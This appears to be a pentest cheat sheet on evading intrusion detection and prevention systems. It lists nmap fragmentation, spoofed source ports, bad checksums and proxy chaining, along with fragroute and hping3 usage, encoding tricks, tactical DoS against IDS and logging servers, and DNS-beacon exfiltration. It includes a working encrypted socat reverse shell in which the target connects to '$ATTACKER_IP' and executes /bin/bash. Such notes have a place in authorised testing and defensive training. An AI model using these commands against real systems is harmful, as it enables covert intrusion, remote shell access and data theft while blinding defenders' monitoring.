2.2 KiB

Raw Blame History

IDS & IPS Evation

Evation by manipulation of
- Protocol
- Payload
- Route
- Or DoS

Protocol Manipulation

Relying on another protocol

nc -ulvnp 4711 for listening to incoming UDP traffic
nc -u $TARGET_IP $TARGET_PORT for connecting through UDP

Manipulation of the source's or LHOST's network port

nmap -g 80 or nmap --source-port 53 to send outgoing nmap traffic through it

Session splicing by fragmentation and segmentation

nmap fragmentation in 8 bytes -f, 16 bytes -ff, --mtu <size> for MTU
Use Fragroute with ip_frag <num> in fragroute.conf, then use fragroute -f fragroute.conf $TARGET_IP

Sending invalid packets

Invalid protocol header flags and checksums vianmap --badsum, nmap --scanflags URG/ACK/PSH/RST/SYN/FIN, e.g. concatentation of multiple flags nmap --scanflags SYNRSTFIN
hping3 including --ttl, --badsum, header flags -S,-A,-P,-U,-F,-R

Payload Manipulation

Obfuscation and Encoding

Base64
URL
Escaped Unicode Characters

Encrypting Communication Channels

Use socat with encryption

openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt

Create .pem (Privacy Enhanced Mail) file via

cat id_rsa.key reverse.crt > reverse.pem

Listening on attacker side

socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT

On target

socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash

Modification of Data

Order of parameters, instead of nc -lvnp it is nc -vpnl
Adding whitespaces to the commands
Use aliases

Route Manipulation

Relying on Source Routing

nmap --ip-options "L 10.10.20.30 10.10.30.40 routes through these IPs loosely
nmap --ip-options "S 10.10.20.30 10.10.30.40" routes through the IPs strictly

Using Proxyy Servers

nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP

Tactical DoS

Non malicious, benign traffic against
- IDS/IPS
- Logging server

MISC

Changing
- User-Agent
- Request frequency and duration of sleep
- SSL/TLS certs
- DNS beacon, storing exfiltrated data in the query